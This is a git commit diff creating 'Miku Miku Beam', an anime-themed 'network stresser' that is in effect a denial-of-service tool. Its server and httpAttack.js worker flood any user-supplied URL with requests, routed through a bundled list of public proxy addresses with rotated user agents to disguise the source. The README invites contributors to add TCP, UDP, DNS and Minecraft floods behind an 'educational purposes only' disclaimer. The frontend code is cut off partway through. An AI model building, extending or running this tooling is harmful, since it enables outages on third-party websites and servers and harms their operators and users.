commit 226d527b584b2d5e76c9519c7806ef8b972c624f Author: Sammwy Date: Mon Jan 20 01:08:36 2025 -0300 feature: ๐ŸŒฑ initial commit diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..a547bf3 --- /dev/null +++ b/.gitignore @@ -0,0 +1,24 @@ +# Logs +logs +*.log +npm-debug.log* +yarn-debug.log* +yarn-error.log* +pnpm-debug.log* +lerna-debug.log* + +node_modules +dist +dist-ssr +*.local + +# Editor directories and files +.vscode/* +!.vscode/extensions.json +.idea +.DS_Store +*.suo +*.ntvs* +*.njsproj +*.sln +*.sw? diff --git a/LICENSE b/LICENSE new file mode 100644 index 0000000..458abb4 --- /dev/null +++ b/LICENSE @@ -0,0 +1,21 @@ +# MIT License + +Copyright (c) 2025 Sammwy + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/README.md b/README.md new file mode 100644 index 0000000..65cc1e0 --- /dev/null +++ b/README.md @@ -0,0 +1,129 @@ +# Miku Miku Beam ๐Ÿ’ฅโšก (Network Stresser) + +A fun and visually appealing stress testing server with a **Miku-themed** frontend, where you can configure and run attacks while enjoying a banger song in the background! ๐ŸŽคโœจ + +## Features ๐ŸŽ‰ + +- ๐ŸŒ **Real-time Attack Visualization**: View your attackโ€™s progress and statistics in real-time as it runs. ๐Ÿ”ฅ +- ๐ŸŽถ **Miku-themed UI**: A cute and vibrant design with Mikuโ€™s vibe to make the process more fun. Includes a banger song to keep you pumped! ๐ŸŽง +- ๐Ÿง‘โ€๐Ÿ’ป **Configurable Attack Parameters**: Easily set the attack method, packet size, duration, and packet delay via the frontend interface. +- ๐Ÿ› ๏ธ **Worker-Based Attack Handling**: The server processes attacks in separate workers for optimal performance and scalability. +- ๐Ÿ“Š **Live Stats**: Track the success and failure of each attack in real-time. See how many packets are sent and whether they succeed or fail. +- ๐Ÿ–ผ๏ธ **Aesthetic Design**: A visually cute interface to make your experience enjoyable. ๐ŸŒธ +- ๐Ÿ“ก **Attack Methods:**: + - `HTTP` - Send HTTP requests + +## Setup ๐Ÿ› ๏ธ + +### Prerequisites ๐Ÿ“ฆ + +Make sure you have the following installed: + +- Node.js (v14 or above) ๐ŸŒฑ +- npm (Node Package Manager) ๐Ÿ“ฆ + +### Installation ๐Ÿ’ป + +1. Clone this repository: + + ```bash + git clone https://github.com/sammwyy/mikumikubeam.git + cd mikumikubeam + ``` + +2. Install the required dependencies: + + ```bash + npm install + ``` + +3. Create the necessary files: + - `proxies.txt` - List of proxies. + - `uas.txt` - List of user agents. + +4. Run the server: + + ```bash + npm run dev + ``` + + The server will run on port `3000` by default. ๐ŸŒ + +5. Open the frontend (usually accessible at `http://localhost:5173`), where you can configure and visualize your attacks. + +## Usage โš™๏ธ + +Once the server is up and running, you can interact with it via the frontend: + +1. **Start Attack**: + - Set up the attack parameters: target URL, attack method (HTTP, etc.), packet size, duration, and delay. + - Press "Start Attack" to initiate the stress test. + +2. **Stop Attack**: + - Press "Stop Attack" to terminate the ongoing attack. + +### Example Request + +```json +{ + "target": "http://example.com", + "attackMethod": "http", + "packetSize": 512, + "duration": 60, + "packetDelay": 500 +} +``` + +## Worker-Based Attack Handling ๐Ÿ”ง๐Ÿ’ก + +Each attack type is handled in a separate worker thread, ensuring that the main server remains responsive. The attack workers are dynamically loaded based on the selected attack method (HTTP, etc...). + +## To-Do ๐Ÿ“ + +- Add more attack methods: + - Minecraft ๐ŸŽฎ + - TCP ๐Ÿ’ป + - UDP ๐ŸŒ + - DNS ๐Ÿ“ก + - And more! ๐Ÿ”ฅ + +- Enhance attack statistics and reporting for better real-time monitoring. ๐Ÿ“Š + +## Contributing ๐Ÿ’– + +Feel free to fork the repo and open pull requests with new attack protocols, bug fixes, or improvements. If you have an idea for a new feature, please share it! ๐Ÿ˜„ + +### Adding New Attack Methods โšก + +To extend the server with new attack methods (e.g., Minecraft, TCP, UDP, DNS), you can create new worker files and add them to the server configuration. + +For example: + +- Add a new attack method in the frontend settings. +- Create the corresponding worker file (e.g., `minecraftAttack.js`). +- Update the attack handler configuration to include the new method. + +```javascript +const attackHandlers = { + http: "./workers/httpAttack.js", + minecraft: "./workers/minecraftAttack.js", + udp: "./workers/udpAttack.js", + tcp: "./workers/tcpAttack.js", + dns: "./workers/dnsAttack.js", + // Add more protocols as needed! +}; +``` + +## License ๐Ÿ“ + +This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. + +--- + +## Disclaimer ๐Ÿšจ + +Please note that this project is for educational purposes only and should not be used for malicious purposes. + +--- + +### (๏ฝกโ™ฅโ€ฟโ™ฅ๏ฝก) Happy Hacking ๐Ÿ’–๐ŸŽถ diff --git a/bun.lockb b/bun.lockb new file mode 100644 index 0000000..cbd6626 Binary files /dev/null and b/bun.lockb differ diff --git a/data/.gitignore b/data/.gitignore new file mode 100644 index 0000000..e5ac18c --- /dev/null +++ b/data/.gitignore @@ -0,0 +1 @@ +me_proxies.txt \ No newline at end of file diff --git a/data/proxies.txt b/data/proxies.txt new file mode 100644 index 0000000..a3f3e70 --- /dev/null +++ b/data/proxies.txt @@ -0,0 +1,10 @@ +http://219.129.167.82:2222 +http://165.232.129.150:80 +http://103.86.109.38:80 +http://8.219.97.248:80 +http://103.49.202.252:80 +socks4://199.58.184.97:4145 +socks4://192.111.139.163:19404 +socks4://199.187.210.54:4145 +socks4://46.105.127.74:45108 +socks4://98.188.47.150:4145 \ No newline at end of file diff --git a/data/uas.txt b/data/uas.txt new file mode 100644 index 0000000..2239d5b --- /dev/null +++ b/data/uas.txt @@ -0,0 +1,10 @@ +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.100 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Mozilla/5.0 (iPhone; CPU iPhone OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Mobile/15E148 Safari/604.1 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/118.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Version/15.4 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:114.0) Gecko/20100101 Firefox/114.0 +Mozilla/5.0 (Linux; Android 11; SM-G991B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Mobile Safari/537.36 +Mozilla/5.0 (Linux; U; Android 11; en-US; SM-G960F Build/RP1A.200720.012) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/91.0.4472.77 Mobile Safari/537.36 +Mozilla/5.0 (iPad; CPU OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1 diff --git a/eslint.config.js b/eslint.config.js new file mode 100644 index 0000000..82c2e20 --- /dev/null +++ b/eslint.config.js @@ -0,0 +1,28 @@ +import js from '@eslint/js'; +import globals from 'globals'; +import reactHooks from 'eslint-plugin-react-hooks'; +import reactRefresh from 'eslint-plugin-react-refresh'; +import tseslint from 'typescript-eslint'; + +export default tseslint.config( + { ignores: ['dist'] }, + { + extends: [js.configs.recommended, ...tseslint.configs.recommended], + files: ['**/*.{ts,tsx}'], + languageOptions: { + ecmaVersion: 2020, + globals: globals.browser, + }, + plugins: { + 'react-hooks': reactHooks, + 'react-refresh': reactRefresh, + }, + rules: { + ...reactHooks.configs.recommended.rules, + 'react-refresh/only-export-components': [ + 'warn', + { allowConstantExport: true }, + ], + }, + } +); diff --git a/index.html b/index.html new file mode 100644 index 0000000..8206b3e --- /dev/null +++ b/index.html @@ -0,0 +1,13 @@ + + + + + + + Miku Beam - Network Stresser + + +
+ + + diff --git a/package.json b/package.json new file mode 100644 index 0000000..46743b2 --- /dev/null +++ b/package.json @@ -0,0 +1,40 @@ +{ + "name": "miku-beam", + "private": true, + "version": "0.0.0", + "type": "module", + "scripts": { + "dev": "concurrently \"npm run dev:client\" \"npm run dev:server\"", + "dev:server": "node server/index.js", + "dev:client": "vite", + "build": "vite build", + "lint": "eslint .", + "preview": "vite preview" + }, + "dependencies": { + "axios": "^1.7.9", + "express": "^4.18.3", + "lucide-react": "^0.344.0", + "react": "^18.3.1", + "react-dom": "^18.3.1", + "socket.io": "^4.7.4", + "socket.io-client": "^4.7.4" + }, + "devDependencies": { + "@eslint/js": "^9.9.1", + "@types/react": "^18.3.5", + "@types/react-dom": "^18.3.0", + "@vitejs/plugin-react": "^4.3.1", + "autoprefixer": "^10.4.18", + "concurrently": "^8.2.2", + "eslint": "^9.9.1", + "eslint-plugin-react-hooks": "^5.1.0-rc.0", + "eslint-plugin-react-refresh": "^0.4.11", + "globals": "^15.9.0", + "postcss": "^8.4.35", + "tailwindcss": "^3.4.1", + "typescript": "^5.5.3", + "typescript-eslint": "^8.3.0", + "vite": "^5.4.2" + } +} diff --git a/postcss.config.js b/postcss.config.js new file mode 100644 index 0000000..2aa7205 --- /dev/null +++ b/postcss.config.js @@ -0,0 +1,6 @@ +export default { + plugins: { + tailwindcss: {}, + autoprefixer: {}, + }, +}; diff --git a/public/audio.mp3 b/public/audio.mp3 new file mode 100644 index 0000000..8b97d32 Binary files /dev/null and b/public/audio.mp3 differ diff --git a/public/miku.gif b/public/miku.gif new file mode 100644 index 0000000..99e24f3 Binary files /dev/null and b/public/miku.gif differ diff --git a/server/index.js b/server/index.js new file mode 100644 index 0000000..ff0d6d6 --- /dev/null +++ b/server/index.js @@ -0,0 +1,102 @@ +import express from "express"; +import { createServer } from "http"; +import { dirname, join } from "path"; +import { Server } from "socket.io"; +import { fileURLToPath } from "url"; +import { Worker } from "worker_threads"; + +import { loadProxies, loadUserAgents } from "./utils/fileLoader.js"; +import { filterProxies } from "./utils/proxyUtils.js"; + +// Define the workers based on attack type +const attackWorkers = { + http: "./workers/httpAttack.js", +}; + +const __filename = fileURLToPath(import.meta.url); +const __dirname = dirname(__filename); + +const app = express(); +const httpServer = createServer(app); +const io = new Server(httpServer, { + cors: { + origin: "http://localhost:5173", + methods: ["GET", "POST"], + }, +}); + +const proxies = loadProxies(join(__dirname, "../data/proxies.txt")); +const userAgents = loadUserAgents(join(__dirname, "../data/uas.txt")); + +console.log("Proxies loaded:", proxies.length); +console.log("User agents loaded:", userAgents.length); + +io.on("connection", (socket) => { + console.log("Client connected"); + + socket.emit("stats", { + pps: 0, + bots: proxies.length, + totalPackets: 0, + log: "๐Ÿค Connected to the server.", + }); + + socket.on("startAttack", (params) => { + const { target, duration, packetDelay, attackMethod } = params; + const filteredProxies = filterProxies(proxies, attackMethod); + const attackWorkerFile = attackWorkers[attackMethod]; + + if (!attackWorkerFile) { + socket.emit("stats", { + log: `โŒ Unsupported attack type: ${attackMethod}`, + }); + return; + } + + socket.emit("stats", { + log: `๐Ÿ’ Using ${filteredProxies.length} filtered proxies to perform attack.`, + bots: filteredProxies.length, + }); + + const worker = new Worker(join(__dirname, attackWorkerFile), { + workerData: { + target, + proxies: filteredProxies, + userAgents, + duration, + packetDelay, + }, + }); + + worker.on("message", (message) => socket.emit("stats", message)); + worker.on("error", (error) => { + console.error(`Worker error: ${error.message}`); + socket.emit("stats", { log: `โŒ Worker error: ${error.message}` }); + }); + worker.on("exit", (code) => { + console.log(`Worker exited with code ${code}`); + socket.emit("attackEnd"); + }); + + socket.worker = worker; + }); + + socket.on("stopAttack", () => { + if (socket.worker) { + socket.worker.terminate(); + socket.emit("attackEnd"); + } + }); + + socket.on("disconnect", () => { + if (socket.worker) { + socket.worker.terminate(); + } + console.log("Client disconnected"); + }); +}); + +const PORT = 3000; +httpServer.listen(PORT, () => { + console.log(`Server running on port ${PORT}`); +}); diff --git a/server/utils/fileLoader.js b/server/utils/fileLoader.js new file mode 100644 index 0000000..71dcd16 --- /dev/null +++ b/server/utils/fileLoader.js @@ -0,0 +1,34 @@ +import fs from "fs"; +import { join } from "path"; + +const currentPath = () => { + const path = process.cwd(); + return path === "/" ? "." : path; +}; + +const loadFileLines = (filePath) => { + try { + return fs + .readFileSync(filePath, "utf8") + .split("\n") + .map((line) => line.trim()) + .filter(Boolean) + .filter((line) => !line.startsWith("#")); + } catch (err) { + console.error(`Error reading ${filePath}:`, err); + return []; + } +}; + +export function loadUserAgents() { + return loadFileLines(join(currentPath(), "data/uas.txt")); +} + +export function loadProxies() { + const lines = loadFileLines(join(currentPath(), "data/proxies.txt")); + return lines.map((line) => { + const [protocol, addr] = line.split("://"); + const [host, port] = addr.split(":"); + return { protocol, host, port }; + }); +} diff --git a/server/utils/proxyUtils.js b/server/utils/proxyUtils.js new file mode 100644 index 0000000..4ea61c0 --- /dev/null +++ b/server/utils/proxyUtils.js @@ -0,0 +1,9 @@ +const METHODS = { + http: ["http", "https"], + tcp: ["socks4", "socks5"], + udp: ["socks4", "socks5"], +}; + +export function filterProxies(proxies, method) { + return proxies.filter((proxy) => METHODS[method].includes(proxy.protocol)); +} diff --git a/server/workers/httpAttack.js b/server/workers/httpAttack.js new file mode 100644 index 0000000..b2a8548 --- /dev/null +++ b/server/workers/httpAttack.js @@ -0,0 +1,49 @@ +import axios from "axios"; +import { parentPort, workerData } from "worker_threads"; + +const startAttack = () => { + const { target, proxies, userAgents, duration, packetDelay } = workerData; + + let fixedTarget = target.startsWith("http") ? target : `http://${target}`; + let totalPackets = 0; + const startTime = Date.now(); + + const sendRequest = async (proxy, userAgent) => { + try { + await axios.get(fixedTarget, { + proxy: { host: proxy.host, port: proxy.port }, + headers: { "User-Agent": userAgent }, + timeout: 2000, + }); + totalPackets++; + parentPort.postMessage({ + log: `โœ… Request successful from ${proxy.host}:${proxy.port} to ${fixedTarget}`, + totalPackets, + }); + } catch (error) { + parentPort.postMessage({ + log: `โŒ Request failed from ${proxy.host}:${proxy.port} to ${fixedTarget}: ${error.message}`, + totalPackets, + }); + } + }; + + const interval = setInterval(() => { + const elapsedTime = (Date.now() - startTime) / 1000; + + if (elapsedTime >= duration) { + clearInterval(interval); + parentPort.postMessage({ log: "Attack finished", totalPackets }); + process.exit(0); + } + + const proxy = proxies[Math.floor(Math.random() * proxies.length)]; + const userAgent = userAgents[Math.floor(Math.random() * userAgents.length)]; + + sendRequest(proxy, userAgent); + }, packetDelay); +}; + +if (workerData) { + startAttack(); +} diff --git a/src/App.tsx b/src/App.tsx new file mode 100644 index 0000000..cf23cca --- /dev/null +++ b/src/App.tsx @@ -0,0 +1,298 @@ +import { Bot, Wand2, Wifi, Zap } from "lucide-react"; +import { useEffect, useRef, useState } from "react"; +import { io } from "socket.io-client"; + +const socket = io("http://localhost:3000"); + +function App() { + const [isAttacking, setIsAttacking] = useState(false); + const [logs, setLogs] = useState([]); + const [progress, setProgress] = useState(0); + const [target, setTarget] = useState(""); + const [attackMethod, setAttackMethod] = useState("http"); + const [packetSize, setPacketSize] = useState(64); + const [duration, setDuration] = useState(60); + const [packetDelay, setPacketDelay] = useState(100); + const [stats, setStats] = useState({ + pps: 0, + bots: 0, + totalPackets: 0, + }); + const [lastUpdatedPPS, setLastUpdatedPPS] = useState(Date.now()); + const [lastTotalPackets, setLastTotalPackets] = useState(0); + const audioRef = useRef(null); + + useEffect(() => { + const now = Date.now(); + if (now - lastUpdatedPPS >= 500) { + setLastUpdatedPPS(now); + setStats((old) => ({ + pps: (old.totalPackets - lastTotalPackets) / (now - lastUpdatedPPS), + bots: old.bots, + totalPackets: old.totalPackets, + })); + setLastTotalPackets(stats.totalPackets); + } + }, [lastUpdatedPPS, lastTotalPackets, stats.totalPackets]); + + useEffect(() => { + socket.on("stats", (data) => { + setStats((old) => ({ + pps: data.pps || old.pps, + bots: data.bots || old.bots, + totalPackets: data.totalPackets || old.totalPackets, + })); + if (data.log) addLog(data.log); + setProgress((prev) => (prev + 10) % 100); + }); + + socket.on("attackEnd", () => { + setIsAttacking(false); + }); + + return () => { + socket.off("stats"); + socket.off("attackEnd"); + }; + }, []); + + const addLog = (message: string) => { + setLogs((prev) => [message, ...prev].slice(0, 12)); + }; + + const startAttack = () => { + if (!target.trim()) { + alert("Please enter a target!"); + return; + } + + setIsAttacking(true); + setStats((old) => ({ + pps: 0, + bots: old.bots, + totalPackets: 0, + })); + addLog("๐Ÿฎ Preparing attack..."); + + // Play audio + if (audioRef.current) { + audioRef.current.currentTime = 0; + audioRef.current.play(); + } + + // Start attack after audio intro + setTimeout(() => { + socket.emit("startAttack", { + target, + packetSize, + duration, + packetDelay, + attackMethod, + }); + }, 10000); + }; + + const stopAttack = () => { + socket.emit("stopAttack"); + setIsAttacking(false); + }; + + return ( +
+